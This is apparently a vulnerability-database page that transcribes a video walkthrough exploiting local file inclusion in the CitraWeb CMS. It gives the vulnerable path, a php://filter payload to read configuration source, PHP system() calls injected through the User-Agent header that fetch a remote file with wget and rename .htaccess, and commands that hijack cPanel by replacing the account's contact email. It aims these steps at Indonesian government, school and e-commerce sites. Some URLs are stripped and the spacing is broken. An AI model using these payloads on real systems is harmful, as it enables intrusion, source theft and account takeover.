CitraWeb Local File Inclusion to Remote Code Execution and get Cpanel

id 4nzeL4 (ID) id
Risk: Medium
Local: No
Remote: Yes

Hi all! in this video I will share about LFI to RCE on WEB Image CMS where this CMS has been used enough on websites in Indonesia such as government, E-commerce, school and others. You can see a list of websites that use this CMS at once to become vuln website for LFI to RCE link: okay I already have one of the targets Target: here I will practice some techniques for utilizing LFI bugs besides for RCE, that is, we can steal Source Code like Config and others so please don't skipp this video unless you are a master wkwk [+] LFI exploits: / system / ajax /? file [+] Get file config with LFI php: //filter/convert.base64-encode/resource=file [+] Exploit RCE: Step 1. Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('wget -O x.php; ls -la')?> // make sure the x.php file already exists step 2. Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('mv .htaccess .htacces')?> // now we access the file x.php // yups succeeded // I will try to enter the code // next we will get Get cpanel access [+] Get Cpanel with RCE: enter command # wget -O.contactemail # mv. contactemail ../ # mv ../.cpanel/contactinfo ../.cpanel/contactinfo2 // admeur07 this is the username for cpanel // > the contents are e-mail to receive the code


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top